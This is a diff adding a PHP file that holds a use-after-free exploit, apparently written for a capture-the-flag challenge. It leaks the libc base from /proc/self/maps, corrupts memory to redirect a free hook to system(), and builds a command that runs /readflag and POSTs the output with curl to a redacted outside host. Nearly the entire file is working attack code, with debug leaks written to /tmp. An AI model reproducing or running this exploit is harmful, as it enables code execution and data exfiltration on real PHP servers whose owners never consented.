|
| 1 | +<?php |
| 2 | +pwn("uname -a"); |
| 3 | + |
| 4 | +function pwn($cmd) { |
| 5 | + global $abc, $helper, $backtrace; |
| 6 | + |
| 7 | + class Vuln { |
| 8 | + public $a; |
| 9 | + public function __destruct() { |
| 10 | + global $backtrace; |
| 11 | + unset($this->a); |
| 12 | + $backtrace = (new Exception)->getTrace(); # ;) |
| 13 | + if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 |
| 14 | + $backtrace = debug_backtrace(); |
| 15 | + } |
| 16 | + } |
| 17 | + } |
| 18 | + |
| 19 | + class Helper { |
| 20 | + public $a, $b, $c, $d; |
| 21 | + } |
| 22 | + |
| 23 | + function str2ptr(&$str, $p = 0, $s = 8) { |
| 24 | + $address = 0; |
| 25 | + $j = $s-1; |
| 26 | + |
| 27 | + $address <<= 8; |
| 28 | + $address |= ord($str[$p+$j]);$j--; |
| 29 | + $address <<= 8; |
| 30 | + $address |= ord($str[$p+$j]);$j--; |
| 31 | + $address <<= 8; |
| 32 | + $address |= ord($str[$p+$j]);$j--; |
| 33 | + $address <<= 8; |
| 34 | + $address |= ord($str[$p+$j]);$j--; |
| 35 | + $address <<= 8; |
| 36 | + $address |= ord($str[$p+$j]);$j--; |
| 37 | + $address <<= 8; |
| 38 | + $address |= ord($str[$p+$j]);$j--; |
| 39 | + $address <<= 8; |
| 40 | + $address |= ord($str[$p+$j]);$j--; |
| 41 | + $address <<= 8; |
| 42 | + $address |= ord($str[$p+$j]);$j--; |
| 43 | + return $address; |
| 44 | + } |
| 45 | + |
| 46 | + |
| 47 | + function write(&$str, $p, $v, $n = 8) { |
| 48 | + $i = 0; |
| 49 | + $str[$p + $i] = chr($v & 0xff); |
| 50 | + $v >>= 8; $i++; |
| 51 | + $str[$p + $i] = chr($v & 0xff); |
| 52 | + $v >>= 8; $i++; |
| 53 | + $str[$p + $i] = chr($v & 0xff); |
| 54 | + $v >>= 8; $i++; |
| 55 | + $str[$p + $i] = chr($v & 0xff); |
| 56 | + $v >>= 8; $i++; |
| 57 | + $str[$p + $i] = chr($v & 0xff); |
| 58 | + $v >>= 8; $i++; |
| 59 | + $str[$p + $i] = chr($v & 0xff); |
| 60 | + $v >>= 8; $i++; |
| 61 | + $str[$p + $i] = chr($v & 0xff); |
| 62 | + $v >>= 8; $i++; |
| 63 | + $str[$p + $i] = chr($v & 0xff); |
| 64 | + $v >>= 8; $i++; |
| 65 | + } |
| 66 | + |
| 67 | + |
| 68 | + |
| 69 | + function trigger_uaf($arg) { |
| 70 | + # str_shuffle prevents opcache string interning |
| 71 | + $arg = str_shuffle(str_repeat('A', 79)); |
| 72 | + echo("sice..."); |
| 73 | + $vuln = new Vuln(); |
| 74 | + $vuln->a = $arg; |
| 75 | + echo("assigned reference"); |
| 76 | + } |
| 77 | + |
| 78 | + |
| 79 | + $hax= file_get_contents('/proc/self/maps'); |
| 80 | + $lol = strpos($hax, "/lib/x86_64-linux-gnu/libc-2.28.so"); |
| 81 | + $libc_base = hexdec(explode("-",explode("\n", substr($hax, $lol-100))[1])[0]); |
| 82 | + $system_ptr = $libc_base + 0x449c0; |
| 83 | + |
| 84 | + $n_alloc = 20; # increase this value if UAF fails |
| 85 | + $contiguous = []; |
| 86 | + |
| 87 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 88 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 89 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 90 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 91 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 92 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 93 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 94 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 95 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 96 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 97 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 98 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 99 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 100 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 101 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 102 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 103 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 104 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 105 | + |
| 106 | + echo("hello"); |
| 107 | + file_put_contents("/tmp/lelel2", "hacked"); |
| 108 | + trigger_uaf('x'); |
| 109 | + $abc = $backtrace[1]['args'][0]; |
| 110 | + |
| 111 | + $helper = new Helper; |
| 112 | + $helper->b = function ($x) { }; |
| 113 | + echo("we're alive"); |
| 114 | + |
| 115 | + |
| 116 | + # fake value |
| 117 | + write($abc, 0x60, 2); |
| 118 | + write($abc, 0x70, 6); |
| 119 | + |
| 120 | + # fake reference |
| 121 | + write($abc, 0x10, 0x44444444); |
| 122 | + write($abc, 0x18, 0xa); |
| 123 | + echo("SICE!\n"); |
| 124 | + $closure_obj = str2ptr($abc, 0x20); |
| 125 | + $binsh = strpos($abc,"/bin/sh",0xbf0000+20*0x20000); |
| 126 | + $base = $binsh - 0x181519; |
| 127 | + $freeh = $base + 1825000; |
| 128 | + file_put_contents("/tmp/leakfd7", substr($abc, $binsh, 8)); |
| 129 | + file_put_contents("/tmp/leakfd",strval($binsh)."\n"); |
| 130 | + file_put_contents("/tmp/leakfd8",substr($abc,$base,10)); |
| 131 | + echo("hm...\n"); |
| 132 | + $fake_obj_offset = $freeh; |
| 133 | + write($abc, $fake_obj_offset, $system_ptr); |
| 134 | + |
| 135 | + $a = ";/readflag > /tmp/sicemehackerman; curl -X POST http://REDACTED/ -d \"@/tmp/sicemehackerman\";#"; |
| 136 | + try{ |
| 137 | + $_SERVER['DEET'] = $a(); |
| 138 | +}catch(Exception $e){ |
| 139 | + echo("exception"); |
| 140 | +} |
| 141 | + echo("we should've crashed"); |
| 142 | + write($abc, 0x41414141, 0xdeadbeef); |
| 143 | + ($helper->b)($cmd); |
| 144 | + exit(); |
| 145 | +} |
| 146 | + |
0 commit comments